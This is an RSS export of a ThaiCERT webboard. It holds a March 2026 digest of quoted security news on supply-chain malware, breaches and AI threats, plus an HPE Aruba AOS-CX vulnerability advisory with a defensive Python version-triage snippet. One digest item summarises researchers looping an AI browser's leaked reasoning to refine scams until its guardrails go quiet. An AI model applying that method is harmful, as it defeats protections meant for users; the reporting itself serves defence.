"Cisco Talos’ Vulnerability Discovery &amp; Research team recently disclosed vulnerabilities in the BioSig Project Libbiosig library and OpenCFD OpenFOAM, as well as an unpatched vulnerability in Microsoft DirectX. The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy, apart from the DirectX vulnerability."<br />
<a href="https://blog.talosintelligence.com/directx-openfoam-libbiosig-vulnerabilities/" target="_blank" rel="noopener noreferrer nofollow ugc">https://blog.talosintelligence.com/directx-openfoam-libbiosig-vulnerabilities/</a></li>
</ul>
<p dir="auto"><strong>Malware</strong></p>
<ul>
<li><strong>The Return Of PhantomRaven: Detecting Three New Waves Of Npm Supply Chain Attacks</strong><br />
"Endor Labs identified 88 new malicious npm packages belonging to three new waves (Wave 2, 3, and 4) of the PhantomRaven campaign distributed between November 2025 and February 2026. At the time of writing, the campaign remains active: 81 of the 88 packages are still available on npm, and two of the three new command-and-control servers continue to operate. PhantomRaven is a software supply chain attack that uses Remote Dynamic Dependencies (RDD) to hide credential-stealing malware in non-registry dependencies that bypass standard security scanning. The first wave, affecting 126+ packages with over 86,000 downloads, was first described by Koi Security in October 2025."<br />
<a href="https://www.endorlabs.com/learn/return-of-phantomraven" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.endorlabs.com/learn/return-of-phantomraven</a><br />
<a href="https://www.bleepingcomputer.com/news/security/new-phantomraven-npm-attack-wave-steals-dev-data-via-88-packages/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/new-phantomraven-npm-attack-wave-steals-dev-data-via-88-packages/</a></li>
<li><strong>Weaponizing Telegram Bots: How Threat Actors Exfiltrate Credentials</strong><br />
"Telegram is a free, online instant messenger platform that is also commonly abused by threat actors for a wide range of malicious activities. One of Telegram’s notable features is its extensive collection of web APIs, one of which is used to interact with automated bot accounts. Notably, Telegram bot accounts are still capable of posting messages in chats and uploading arbitrary files such as screenshots or archives of stolen information. As such, Telegram bots are often used by threat actors as a method of data exfiltration through a technically legitimate service."<br />
<a href="https://cofense.com/blog/weaponizing-telegram-bots-how-threat-actors-exfiltrate-credentials" target="_blank" rel="noopener noreferrer nofollow ugc">https://cofense.com/blog/weaponizing-telegram-bots-how-threat-actors-exfiltrate-credentials</a></li>
<li><strong>Inside p1bot: A Vishing Platform Weaponizing ElevenLabs</strong><br />
"The threat intelligence community has been sounding the alarm on AI-powered social engineering for over a year. OpenAI's quarterly disruption reports have documented threat actors using LLMs to craft phishing lures, generate fake resumes, and scale influence operations. Google's Mandiant team published research in 2024 showing how AI-powered voice spoofing has been incorporated into red team operations, demonstrating just how convincing synthetic voices have become. Academic researchers have even built proof-of-concept vishing bots using off-the-shelf APIs (OpenAI's GPT for conversation, ElevenLabs for voice synthesis, Twilio for telephony) and demonstrated them against human subjects."<br />
<a href="https://www.miragesecurity.ai/blog/inside-p1bot-vishing-platform-weaponizing-elevenlabs" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.miragesecurity.ai/blog/inside-p1bot-vishing-platform-weaponizing-elevenlabs</a><br />
<a href="https://www.helpnetsecurity.com/2026/03/11/researchers-uncover-ai-powered-vishing-platform/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/11/researchers-uncover-ai-powered-vishing-platform/</a></li>
<li><strong>Phishers Hide Scam Links With IPv6 Trick In “free Toothbrush” Emails</strong><br />
"A recurring lure in phishing emails impersonating United Healthcare is the promise of a free Oral-B toothbrush. But the interesting part isn’t the toothbrush. It’s the link. Recently we found that these phishers have moved from using Microsoft Azure Blob Storage (links looking like this: https://{string}.blob.core.windows.net/{same string}/1.html) to links obfuscated by using an IPv6-mapped IPv4 address to hide the IP in a way that looks confusing but is still perfectly valid and routable. For example: http://[::ffff:5111:8e14]/"<br />
<a href="https://www.malwarebytes.com/blog/scams/2026/03/phishers-hide-scam-links-with-ipv6-trick-in-free-toothbrush-emails" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.malwarebytes.com/blog/scams/2026/03/phishers-hide-scam-links-with-ipv6-trick-in-free-toothbrush-emails</a></li>
<li><strong>Iran Conflict Drives Heightened Espionage Activity Against Middle East Targets</strong><br />
"On 28 February 2026, the US and Israel conducted strikes targeting assets inside Iran, in a campaign the US called Operation Epic Fury. According to public sourcing, the attacks targeted Iranian missiles and air defenses, other military infrastructure, and Iranian leadership. Iran responded with retaliatory missile and drone strikes in the region, targeting US embassies and military installations. As the war continues into its second week, several Iranian hacktivist groups and personas have claimed responsibility for various disruptive operations. Iranian espionage-focused threat groups remain somewhat active despite the Iranian government’s shutdown of the internet immediately following the initial US and Israeli attacks."<br />
<a href="https://www.proofpoint.com/us/blog/threat-insight/iran-conflict-drives-heightened-espionage-activity-against-middle-east-targets" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.proofpoint.com/us/blog/threat-insight/iran-conflict-drives-heightened-espionage-activity-against-middle-east-targets</a></li>
<li><strong>“AgenticBlabbering”: How AI Browsers’ Verbose Reasoning Fuels The Ultimate Scamming Machine</strong><br />
"AI Browsers are not just browsing for us, they are browsing as us, with full access to our personal private data. And while they do it, they also talk way too much. This is AgenticBlabbering: a stream of internal reasoning, tool calls, screenshots, and security hesitations that reveals how the browser decides what is “safe enough” to click. By sniffing Comet’s agent traffic, we got a first-of-its-kind view into how an AI Browser actually thinks, and how much of that thinking leaks out. Then we put the black hat on and weaponized it. We fed that blabbering into a GAN-style loop that auto-generates scam flows, critiques and reshapes them using the agent’s own reactions, and iterates until the guardrails go quiet. We expected it to take hours."<br />
<a href="https://guard.io/labs/agenticblabbering---how-ai-browsers-verbose-reasoning-fuels-the-ultimate-scamming-machine" target="_blank" rel="noopener noreferrer nofollow ugc">https://guard.io/labs/agenticblabbering---how-ai-browsers-verbose-reasoning-fuels-the-ultimate-scamming-machine</a><br />
<a href="https://thehackernews.com/2026/03/researchers-trick-perplexitys-comet-ai.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://thehackernews.com/2026/03/researchers-trick-perplexitys-comet-ai.html</a></li>
<li><strong>5 Malicious Rust Crates Posed As Time Utilities To Exfiltrate .env Files</strong><br />
"Socket’s Threat Research Team uncovered a coordinated supply chain campaign in the Rust ecosystem involving five malicious crates: chrono_anchor, dnp3times, time_calibrator, time_calibrators, and time-sync. RustSec and the GitHub Advisory Database document that <a href="http://crates.io" target="_blank" rel="noopener noreferrer nofollow ugc">crates.io</a> security yanked four of these packages shortly after publication. The fifth package, chrono_anchor, shows the threat actor is adapting. It introduced minor obfuscation and operational changes that reduced obvious indicators and helped it remain listed on <a href="http://crates.io" target="_blank" rel="noopener noreferrer nofollow ugc">crates.io</a> until we identified and reported it."<br />
<a href="https://socket.dev/blog/5-malicious-rust-crates-posed-as-time-utilities-to-exfiltrate-env-files" target="_blank" rel="noopener noreferrer nofollow ugc">https://socket.dev/blog/5-malicious-rust-crates-posed-as-time-utilities-to-exfiltrate-env-files</a><br />
<a href="https://thehackernews.com/2026/03/five-malicious-rust-crates-and-ai-bot.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://thehackernews.com/2026/03/five-malicious-rust-crates-and-ai-bot.html</a></li>
</ul>
<p dir="auto"><strong>Breaches/Hacks/Leaks</strong></p>
<ul>
<li><strong>Medtech Giant Stryker Offline After Iran-Linked Wiper Malware Attack</strong><br />
"Leading medical technology company Stryker has been hit by a wiper malware attack claimed by Handala, an Iranian-linked and pro-Palestinian hacktivist group. The medtech giant manufactures a range of products, including surgical and neurotechnology equipment. With over 53,000 employees, Stryker is a Fortune 500 company that reported global sales of $22.6 billion in 2024. Handala says they stole 50 terabytes of data before wiping tens of thousands of systems and servers across the company's network, forcing Stryker to shut down in "an unprecedented blow.""<br />
<a href="https://www.bleepingcomputer.com/news/security/medtech-giant-stryker-offline-after-iran-linked-wiper-malware-attack/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/medtech-giant-stryker-offline-after-iran-linked-wiper-malware-attack/</a><br />
<a href="https://therecord.media/stryker-cyberattack-iran-hackers" target="_blank" rel="noopener noreferrer nofollow ugc">https://therecord.media/stryker-cyberattack-iran-hackers</a><br />
<a href="https://www.bankinfosecurity.com/medtech-firm-stryker-disrupted-by-pro-iran-hackers-a-30980" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bankinfosecurity.com/medtech-firm-stryker-disrupted-by-pro-iran-hackers-a-30980</a><br />
<a href="https://hackread.com/iran-handala-hackers-verifone-stryker-hacks/" target="_blank" rel="noopener noreferrer nofollow ugc">https://hackread.com/iran-handala-hackers-verifone-stryker-hacks/</a><br />
<a href="https://www.securityweek.com/medtech-giant-stryker-crippled-by-iran-linked-hacker-attack/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/medtech-giant-stryker-crippled-by-iran-linked-hacker-attack/</a><br />
<a href="https://securityaffairs.com/189304/hacktivism/pro-palestinian-hacktivist-group-handala-targets-stryker-in-global-disruption.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://securityaffairs.com/189304/hacktivism/pro-palestinian-hacktivist-group-handala-targets-stryker-in-global-disruption.html</a><br />
<a href="https://www.theregister.com/2026/03/11/us_medtech_firm_stryker_cyberattack_iran/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.theregister.com/2026/03/11/us_medtech_firm_stryker_cyberattack_iran/</a></li>
<li><strong>Xygeni GitHub Action Compromised Via Tag Poison</strong><br />
"An unidentified threat actor breached one of application security vendor Xygeni's GitHub Actions this month via tag poisoning. Xygeni, which sells a number of AI-powered AppSec products, said in a March 10 security incident report that it "detected suspicious activity affecting the repository used to publish the xygeni/xygeni-action GitHub Action." The attacker used pull requests in an effort to introduce malicious code (a compact command-and-control implant) into the repository, though Xygeni said the attempts were blocked via existing branch detection rules."<br />
<a href="https://www.darkreading.com/application-security/xygeni-github-action-compromised-via-tag-poison" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.darkreading.com/application-security/xygeni-github-action-compromised-via-tag-poison</a><br />
<a href="https://xygeni.io/blog/security-incident-report-xygeni-action-github-action-compromise/" target="_blank" rel="noopener noreferrer nofollow ugc">https://xygeni.io/blog/security-incident-report-xygeni-action-github-action-compromise/</a></li>
<li><strong>238,000 Impacted By Bell Ambulance Data Breach</strong><br />
"Ambulance services provider Bell Ambulance is notifying nearly 238,000 individuals that their personal, financial account, medical, and health insurance information was compromised in a February 2025 data breach. The Milwaukee, Wisconsin-based healthcare organization detected the network intrusion on February 13, 2025, and disclosed the incident on April 14, roughly a month after the Medusa ransomware gang claimed responsibility for it. Bell Ambulance said at the time that 114,000 people had been impacted."<br />
<a href="https://www.securityweek.com/238000-impacted-by-bell-ambulance-data-breach/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/238000-impacted-by-bell-ambulance-data-breach/</a><br />
<a href="https://therecord.media/235000-affected-cyberattack-ambulance-provider" target="_blank" rel="noopener noreferrer nofollow ugc">https://therecord.media/235000-affected-cyberattack-ambulance-provider</a></li>
<li><strong>Michelin Confirms Data Breach Linked To Oracle EBS Attack</strong><br />
"Tire giant Michelin has confirmed a data breach stemming from the massive cybercrime campaign that targeted organizations using Oracle’s E-Business Suite (EBS) solution. The Cl0p ransomware and extortion group has taken credit for the EBS hacking campaign, which involved the exploitation of zero-day vulnerabilities to gain access to data stored by the targeted organizations in Oracle’s enterprise management software. It’s worth noting that while Cl0p serves as the public-facing extortion brand for the Oracle EBS campaign, cybersecurity researchers believe the operation was driven by a sophisticated cluster of threat actors, most notably FIN11."<br />
<a href="https://www.securityweek.com/michelin-confirms-data-breach-linked-to-oracle-ebs-attack/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/michelin-confirms-data-breach-linked-to-oracle-ebs-attack/</a></li>
<li><strong>Iran-Linked Hackers Claim Cyberattack On Albania’s Parliament Email Systems</strong><br />
"Albania’s parliament said late Tuesday that it had been targeted by a “sophisticated” cyberattack aimed at deleting data and compromising several internal systems. In a statement shared with local media, parliament said its main systems and official website remained operational but confirmed that internal email services used by the parliamentary administration had been temporarily suspended. The disruption affected both incoming and outgoing communications."<br />
<a href="https://therecord.media/iran-linked-hackers-claim-cyberattack-albania-parliament" target="_blank" rel="noopener noreferrer nofollow ugc">https://therecord.media/iran-linked-hackers-claim-cyberattack-albania-parliament</a></li>
</ul>
<p dir="auto"><strong>General News</strong></p>
<ul>
<li><strong>The Bridge To AI Value Will Be Built, Not Bought</strong><br />
"The conversation around artificial intelligence often feels like a pendulum swinging between two extremes: a utopian future of effortless productivity and a dystopian vision of mass job displacement and hollowed-out economic growth. This "ghost GDP" thesis—the idea that AI will create statistical gains that fail to circulate through the real economy—stokes anxiety for business leaders and the public alike. But the facts on the ground from enterprises tell a different story. It’s a more pragmatic, grounded and ultimately more optimistic narrative. The evidence doesn't point to a speculative bubble or a workforce collapse. Instead, it shows a global economy in a period of foundational construction."<br />
<a href="https://www.cognizant.com/us/en/insights/insights-blog/bridge-to-ai-value-will-be-built-not-bought" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.cognizant.com/us/en/insights/insights-blog/bridge-to-ai-value-will-be-built-not-bought</a><br />
<a href="https://www.bankinfosecurity.com/plug-and-play-ai-myth-for-enterprises-a-30977" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bankinfosecurity.com/plug-and-play-ai-myth-for-enterprises-a-30977</a></li>
<li><strong>Agentic AI Security: Why You Need To Know About Autonomous Agents Now</strong><br />
"Agentic AI is making headlines worldwide for its potential force-multiplying capabilities, and organizations are understandably intrigued by how it can improve throughput and capabilities. However, as with any technological revolution, unforeseen issues are inevitable, and agentic AI is no exception. In organizations, these issues often arise from deploying personal assistants like OpenClaw or AI agents designed to optimize business and IT processes. Additionally, when personal assistants interact with “social networks” such as Moltbook, they introduce many hidden threats for organizations. These specific risks fall beyond the scope of this article, and will be addressed in a future blog."<br />
<a href="https://blog.talosintelligence.com/agentic-ai-security-why-you-need-to-know-about-autonomous-agents-now/" target="_blank" rel="noopener noreferrer nofollow ugc">https://blog.talosintelligence.com/agentic-ai-security-why-you-need-to-know-about-autonomous-agents-now/</a></li>
<li><strong>Middle East Conflict Highlights Cloud Resilience Gaps</strong><br />
"Businesses that counted on the cloud's distributed nature to guarantee their data's availability have had a cold dose of reality during the past two weeks. On Feb. 28, following military strikes by the US and Israel, Iran's Internet traffic fell to less than 1% across all major networks in the country, according to Cloudflare Radar, which tracks Internet traffic internationally. Within 24 hours, Iran responded, targeting infrastructure in the United Arab Emirates, Bahrain, and other Gulf States, hitting two Amazon Web Services' facilities in the UAE with drone strikes, while a third facility in Bahrain suffered "physical impacts to [its] infrastructure," Amazon Web Services stated March 2 on its AWS Health Dashboard."<br />
<a href="https://www.darkreading.com/cyber-risk/middle-east-conflict-highlights-cloud-resilience-gaps" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.darkreading.com/cyber-risk/middle-east-conflict-highlights-cloud-resilience-gaps</a></li>
<li><strong>France: National Cybersecurity Agency Reports Ransomware Attack Drop In 2025</strong><br />
"The French Cybersecurity Agency (ANSSI) has confirmed the decline of known ransomware attacks in 2025, in part due to successful law enforcement operations. The latest edition of the agency’s annual threat report, published on March 11, dives into the range of cyber threats that French public and private organizations have faced in 2025. According to ANSSI data, there were 128 ransomware attacks reported in France in 2025, slightly fewer than the 141 such attacks recorded in 2024."<br />
<a href="https://www.infosecurity-magazine.com/news/france-anssi-ransomware-attack/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.infosecurity-magazine.com/news/france-anssi-ransomware-attack/</a></li>
<li><strong>Cyber-Attacks On UK Firms Increase At Four Times Global Rate</strong><br />
"UK organizations were hit by far fewer cyber-attacks in February than the global average, but the year-on-year (YoY) increase was nearly four times the growth rate worldwide, according to Check Point. The security vendor’s February 2026 Global Threat Intelligence report revealed that it blocked an average of 2086 cyber-attacks per organization per week globally, a 9.8% year-on-year (YoY) increase. In the UK, the figure was only 1504 per week, but that represented a 36% YoY increase. Education, energy &amp; utilities, government, healthcare and financial services were among the most frequently targeted sectors in the UK."<br />
<a href="https://www.infosecurity-magazine.com/news/cyberattacks-uk-firms-increase/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.infosecurity-magazine.com/news/cyberattacks-uk-firms-increase/</a></li>
<li><strong>How To 10x Your Vulnerability Management Program In The Agentic Era</strong><br />
"The age of agentic cyberattacks isn’t coming; it’s here. In November 2025, Anthropic disclosed that a Chinese threat actor had weaponized Claude to launch an agentic cyberattack, operating autonomously with minimal human intervention. The artificial intelligence (AI) conducted reconnaissance, exploit development, credential theft, lateral movement and data exfiltration at a speed that no human team could match."<br />
<a href="https://www.securityweek.com/how-to-10x-your-vulnerability-management-program-in-the-agentic-era/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/how-to-10x-your-vulnerability-management-program-in-the-agentic-era/</a></li>
<li><strong>Automotive Tech: A Vast New Cyber Attack Surface</strong><br />
"For decades, the biggest risks associated with cars were tangible and immediate. Vehicles crashed. Engines failed. People were injured or killed. In response, and under pressure from regulatory agencies and insurers, automakers poured enormous effort into physical safety: crash testing, safety standards, recalls, airbags, and structural engineering. Over time, safety became non‑negotiable."<br />
<a href="https://blog.barracuda.com/2026/03/11/automotive-tech-new-cyber-attack-surface" target="_blank" rel="noopener noreferrer nofollow ugc">https://blog.barracuda.com/2026/03/11/automotive-tech-new-cyber-attack-surface</a></li>
<li><strong>SOC Threat Radar — March 2026</strong><br />
"Identity-based threats continue to rise — particularly those involving anomalous logins using stolen credentials (see SOC Threat Radar — December 2025). During February, around one in every 16 suspicious logins came from Romania. This is an unexpected and anomalous increase compared to previous months, which is a clear indicator of suspicious activity."<br />
<a href="https://blog.barracuda.com/2026/03/11/soc-threat-radar-march-2026" target="_blank" rel="noopener noreferrer nofollow ugc">https://blog.barracuda.com/2026/03/11/soc-threat-radar-march-2026</a></li>
<li><strong>Global Law Enforcement Agencies, With Support From Meta, Disrupt Major Criminal Scam Networks Based In Southeast Asia</strong><br />
"Online scams have become significantly more sophisticated and industrialized in recent years, with criminal networks often based in Southeast Asia in countries like Cambodia, Myanmar, and Laos running what amount to full-scale business operations. These operations cause real harm — they upend lives, destroy trust, and are deliberately designed to avoid detection and disruption. The work to protect people against scammers is never done, and requires ongoing collaboration with partners across the tech industry and law enforcement to ensure a safer experience for everyone online."<br />
<a href="https://about.fb.com/news/2026/03/meta-global-law-enforcement-disrupt-major-southeast-asia-criminal-scam-networks/" target="_blank" rel="noopener noreferrer nofollow ugc">https://about.fb.com/news/2026/03/meta-global-law-enforcement-disrupt-major-southeast-asia-criminal-scam-networks/</a><br />
<a href="https://thehackernews.com/2026/03/meta-disables-150k-accounts-linked-to.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://thehackernews.com/2026/03/meta-disables-150k-accounts-linked-to.html</a><br />
<a href="https://www.theregister.com/2026/03/11/meta_international_cops_ai_scammers/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.theregister.com/2026/03/11/meta_international_cops_ai_scammers/</a></li>
<li><strong>What Boards Must Demand In The Age Of AI-Automated Exploitation</strong><br />
"“You knew, and you could have acted. Why didn’t you?” This is the question you do not want to be asked. And increasingly, it’s the question leaders are forced to answer after an incident. For years, many executive teams and boards have treated a large vulnerability backlog as an uncomfortable but tolerable fact of life: “we’ve accepted the risk.” If you’ve ever seen a report showing thousands (or tens of thousands) of open Highs and Critical CVEs, you’ve probably also heard the usual rationalizations from folks that would rather look the other way: we have other priorities, this will take years of engineering time to fix, how do you know these are really Critical, we’re still prioritizing, we’ll get to it."<br />
<a href="https://thehackernews.com/2026/03/what-boards-must-demand-in-age-of-ai.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://thehackernews.com/2026/03/what-boards-must-demand-in-age-of-ai.html</a></li>
<li><strong>Meta Says It Culled Millions Of Scam Ads Amid Accusations That It Profits From Them</strong><br />
"Meta said it removed 159 million scam ads in 2025, amid calls from U.S. lawmakers for an investigation into the company’s “facilitation of and profiting from” fraudulent advertising. The company said it also removed 10.9 million Facebook and Instagram accounts associated with criminal scam centers as it rolled out new tools aimed at stopping online fraud, something Meta describes as “one of the fastest-growing forms of organized crime globally.” Americans lost more than $10 billion to scams in 2023, according to the Federal Trade Commission (FTC), with hundreds of billions stolen globally through schemes that often begin on social media."<br />
<a href="https://therecord.media/meta-scam-advertising-crackdown" target="_blank" rel="noopener noreferrer nofollow ugc">https://therecord.media/meta-scam-advertising-crackdown</a></li>
</ul>
<p dir="auto"><strong>References</strong><br />
Electronic Transactions Development Agency (ETDA) <img src="/assets/uploads/files/1773309746966-f7894c17-a094-43d4-bc2a-31fda325794a-image.png" alt="f7894c17-a094-43d4-bc2a-31fda325794a-image.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2691/cyber-threat-intelligence-12-march-2026</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2691/cyber-threat-intelligence-12-march-2026</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Thu, 12 Mar 2026 10:02:28 GMT</pubDate></item><item><title><![CDATA[BlackSanta malware found targeting HR departments, using an EDR Killer technique to disable kernel-level protection tools]]></title><description><![CDATA[<p dir="auto"><img src="/assets/uploads/files/1773309148116-9a6094fc-736c-4cfe-a785-7f2c207fd152-image.png" alt="9a6094fc-736c-4cfe-a785-7f2c207fd152-image.png" class=" img-fluid img-markdown" /> <img src="/assets/uploads/files/1773309153911-%E0%B8%9E%E0%B8%9A%E0%B8%A1-%E0%B8%A5%E0%B9%81%E0%B8%A7%E0%B8%A3-blacksanta-%E0%B8%A1-%E0%B8%87%E0%B9%80%E0%B8%9B-%E0%B8%B2%E0%B8%9D-%E0%B8%B2%E0%B8%A2-hr-%E0%B9%83%E0%B8%8A-%E0%B9%80%E0%B8%97%E0%B8%84%E0%B8%99-%E0%B8%84-edr-killer.png" alt="พบมัลแวร์ BlackSanta มุ่งเป้าฝ่าย HR ใช้เทคนิค EDR Killer .png" class=" img-fluid img-markdown" /></p>
<p dir="auto"><strong>Follow the news on the webboard or on Facebook NCSA Thailand</strong>  <img src="/assets/uploads/files/1773309167239-5eefd434-1794-4c0c-a972-097e3c18669b-image.png" alt="5eefd434-1794-4c0c-a972-097e3c18669b-image.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2690/พบม-ลแวร-blacksanta-ม-งเป-าฝ-าย-hr-ใช-เทคน-ค-edr-killer-ป-ดเคร-องม-อป-องก-นระด-บเคอร-เนล</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2690/พบม-ลแวร-blacksanta-ม-งเป-าฝ-าย-hr-ใช-เทคน-ค-edr-killer-ป-ดเคร-องม-อป-องก-นระด-บเคอร-เนล</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Thu, 12 Mar 2026 09:52:49 GMT</pubDate></item><item><title><![CDATA[Modified AuraInspector tool found being used to scan and steal data from Salesforce systems]]></title><description><![CDATA[<p dir="auto"><img src="/assets/uploads/files/1773309115035-56481ded-ccfd-455a-852e-81a10cae9478-image.png" alt="56481ded-ccfd-455a-852e-81a10cae9478-image.png" class=" img-fluid img-markdown" /> <img src="/assets/uploads/files/1773309119769-%E0%B8%9E%E0%B8%9A%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%83%E0%B8%8A-%E0%B9%80%E0%B8%84%E0%B8%A3-%E0%B8%AD%E0%B8%87%E0%B8%A1-%E0%B8%AD-aurainspector-%E0%B8%94-%E0%B8%94%E0%B9%81%E0%B8%9B%E0%B8%A5%E0%B8%87%E0%B9%80%E0%B8%9E-%E0%B8%AD%E0%B8%AA%E0%B9%81%E0%B8%81%E0%B8%99.png" alt="พบการใช้เครื่องมือ AuraInspector ดัดแปลงเพื่อสแกน.png" class=" img-fluid img-markdown" /></p>
<p dir="auto"><strong>Follow the news on the webboard or on Facebook NCSA Thailand</strong>  <img src="/assets/uploads/files/1773309133236-c9ecd2ec-f1fb-4cb2-ba6f-4935ea229bb8-image.png" alt="c9ecd2ec-f1fb-4cb2-ba6f-4935ea229bb8-image.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2689/พบการใช-เคร-องม-อ-aurainspector-ด-ดแปลงเพ-อสแกนและขโมยข-อม-ลจากระบบ-salesforce</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2689/พบการใช-เคร-องม-อ-aurainspector-ด-ดแปลงเพ-อสแกนและขโมยข-อม-ลจากระบบ-salesforce</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Thu, 12 Mar 2026 09:52:15 GMT</pubDate></item><item><title><![CDATA[Warning! ‘BeatBanker’ malware hides in a fake Starlink app to steal banking data while covertly mining cryptocurrency on victims' devices]]></title><description><![CDATA[<p dir="auto"><img src="/assets/uploads/files/1773309065157-114b4fa1-a2d3-4d22-8e85-411328506449-image.png" alt="114b4fa1-a2d3-4d22-8e85-411328506449-image.png" class=" img-fluid img-markdown" /> <img src="/assets/uploads/files/1773309078289-%E0%B8%A3%E0%B8%B0%E0%B8%A7-%E0%B8%87-%E0%B8%A1-%E0%B8%A5%E0%B9%81%E0%B8%A7%E0%B8%A3-beatbanker-%E0%B9%81%E0%B8%9D%E0%B8%87%E0%B8%95-%E0%B8%A7%E0%B9%83%E0%B8%99%E0%B9%81%E0%B8%AD%E0%B8%9B-starlink-%E0%B8%9B%E0%B8%A5%E0%B8%AD%E0%B8%A1-%E0%B8%88.png" alt="ระวัง! มัลแวร์ ‘BeatBanker’ แฝงตัวในแอป Starlink ปลอม จ้.png" class=" img-fluid img-markdown" /></p>
<p dir="auto"><strong>Follow the news on the webboard or on Facebook NCSA Thailand</strong>  <img src="/assets/uploads/files/1773309102870-4861cac3-5ad8-46e5-9ddf-8c7e1636b3cb-image.png" alt="4861cac3-5ad8-46e5-9ddf-8c7e1636b3cb-image.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2688/ระว-ง-ม-ลแวร-beatbanker-แฝงต-วในแอป-starlink-ปลอม-จ-องขโมยข-อม-ลธนาคารพร-อมแอบใช-เคร-องเหย-อข-ดคร-ปโต</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2688/ระว-ง-ม-ลแวร-beatbanker-แฝงต-วในแอป-starlink-ปลอม-จ-องขโมยข-อม-ลธนาคารพร-อมแอบใช-เคร-องเหย-อข-ดคร-ปโต</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Thu, 12 Mar 2026 09:51:44 GMT</pubDate></item><item><title><![CDATA[Check now! Critical vulnerability in HPE Aruba Networking AOS-CX risks administrator password reset]]></title><description><![CDATA[<p dir="auto">ThaiCERT, monitoring the cyber threat landscape, has noted a report of a patched vulnerability in HPE Aruba Networking AOS-CX (used on CX-Series switches) affecting the web-based management interface. Organisations running it should check their versions promptly, apply the vendor's patches as soon as possible, and restrict access to the management interface to trusted networks and IP addresses.</p>
<ol>
<li>
<p dir="auto">Vulnerability details [1]<br />
CVE-2026-23813 (CVSS v3.1: 9.8), authentication bypass. A flaw in the AOS-CX web management interface can be exploited by a remote, unauthenticated attacker to bypass authentication and, in some cases, reset the administrator password. An attacker could thereby take administrative control of the network device, for example changing policy, ACL and VLAN configuration, which exposes internal traffic to interception or redirection and allows the attacker to pivot to other critical systems. Business continuity is also at risk if core network devices are reconfigured or rendered unavailable.</p>
</li>
<li>
<p dir="auto">Affected versions<br />
• AOS-CX 10.17.0001 and below<br />
• AOS-CX 10.16.1020 and below<br />
• AOS-CX 10.13.1160 and below<br />
• AOS-CX 10.10.1170 and below</p>
</li>
<li>
<p dir="auto">Fixed versions [2]<br />
• AOS-CX 10.17.1001 and above<br />
• AOS-CX 10.16.1030 and above<br />
• AOS-CX 10.13.1161 and above<br />
• AOS-CX 10.10.1180 and above</p>
</li>
<li>
<p dir="auto">If you cannot update immediately (temporary mitigations)<br />
4.1 Restrict access with Access Control Lists (ACLs): configure control plane ACLs so that only trusted IP addresses can reach the HTTP/HTTPS or REST management interface.<br />
4.2 Separate the management network: place the management interface in a dedicated VLAN or Layer 2 segment so that it is clearly isolated, reducing the risk of unauthorised access.<br />
4.3 Disable the web UI on ports that do not need it: turn off the HTTP/HTTPS interface on ports that carry general traffic (routed ports) unless it is required there for management.</p>
</li>
<li>
<p dir="auto">References<br />
5.1 <a href="https://dg.th/g08wydt3ae" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/g08wydt3ae</a><br />
5.2 <a href="https://dg.th/z67ye0d3v4" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/z67ye0d3v4</a></p>
</li>
</ol>
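<p dir="auto">As an added worked example (not part of the ThaiCERT advisory and not HPE tooling), the Python below turns the version lists in sections 2 and 3 into a triage over a switch inventory. The four branch boundaries are exactly those stated above. The <code>show version</code> line format with a platform prefix such as <code>GL.</code> is an assumption, and any build that falls between a branch's listed affected and fixed values, or on a branch the advisory does not list at all, is reported as unlisted rather than guessed.</p>

```python
import re

# Version boundaries copied from the advisory text above:
# (major, minor) -> (highest affected build, lowest fixed build).
# Branches the advisory does not mention (for example 10.14 or 10.15)
# are deliberately absent rather than inferred.
ADVISORY_BRANCHES = {
    (10, 17): ((10, 17, 1), (10, 17, 1001)),
    (10, 16): ((10, 16, 1020), (10, 16, 1030)),
    (10, 13): ((10, 13, 1160), (10, 13, 1161)),
    (10, 10): ((10, 10, 1170), (10, 10, 1180)),
}

# First dotted triple anywhere in the text. Tolerates a platform prefix such
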